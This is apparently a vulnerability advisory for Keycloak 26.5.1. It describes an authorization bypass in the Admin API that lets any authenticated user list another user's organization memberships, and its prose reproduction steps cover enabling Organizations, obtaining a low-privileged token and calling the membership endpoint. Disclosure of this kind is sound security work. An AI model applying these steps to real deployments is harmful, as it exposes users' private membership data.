Keycloak Authorization Bypass Vulnerability in Admin API Allows Organization Membership Enumeration

An authorization bypass vulnerability has been identified in the Keycloak Admin API, specifically in version 26.5.1. This flaw allows any authenticated user, regardless of administrative privileges, to enumerate the organization memberships of other users. The vulnerability arises when the Organizations feature is enabled, and the attacker knows the victim's unique identifier (UUID).

Impact

Exploitation of this vulnerability could lead to unauthorized information disclosure, allowing users to access organization membership details of others without proper authorization.

Reproduction

To reproduce this vulnerability, enable the Organizations feature and create multiple organizations. Then, create a victim user and assign them to several organizations. Next, create a low-privileged user without administrative roles and obtain an OIDC access token for this user. Finally, execute a GET request to the organizations membership endpoint using the low-privileged token. The server will respond with a list of the victim's organization memberships, bypassing the expected permission checks.